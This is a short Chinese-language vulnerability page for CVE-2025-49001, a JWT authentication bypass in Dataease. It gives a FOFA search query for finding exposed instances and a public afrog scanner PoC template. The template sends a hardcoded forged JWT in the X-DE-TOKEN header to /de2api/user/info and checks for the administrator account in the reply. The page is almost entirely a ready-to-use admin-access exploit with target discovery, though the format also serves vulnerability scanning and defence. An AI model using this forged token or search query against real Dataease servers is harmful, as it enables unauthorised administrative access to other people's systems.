CVE-2025-49001: Dataease JWT 认证绕过漏洞

日期: 2025-09-01 | 影响软件: Dataease | POC: 已公开

漏洞描述

CVE-2025-49001 是由于JWT校验机制错误导致攻击者可伪造JWT令牌绕过身份验证流程 fofa:body="/js/index-0.0.0-dataease.js" || body="/assets/css/style-0.0.0-dataease.css"

PoC代码[已公开]

id: CVE-2025-49001

info:
  name: Dataease JWT 认证绕过漏洞
  author: avic123
  severity: high
  verified: true
  description: |
    CVE-2025-49001 是由于JWT校验机制错误导致攻击者可伪造JWT令牌绕过身份验证流程
    fofa:body="/js/index-0.0.0-dataease.js" || body="/assets/css/style-0.0.0-dataease.css"
  reference:
    - https://mp.weixin.qq.com/s/2-FBRPZdPY-4MLYC9Syveg
  tags: cve,cve2025,Dataease,JWT
  created: 2025/06/11

rules:
  r0:
    request:
      method: GET
      path: /de2api/user/info
      headers:
        X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
    expression: response.status == 200 && response.body.bcontains(b"\"id\":\"1\"") && response.body.bcontains(b"\"name\":\"系统管理员\"") && response.body.bcontains(b"\"oid\":\"1\"")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2025/CVE-2025-49001.yaml

相关漏洞推荐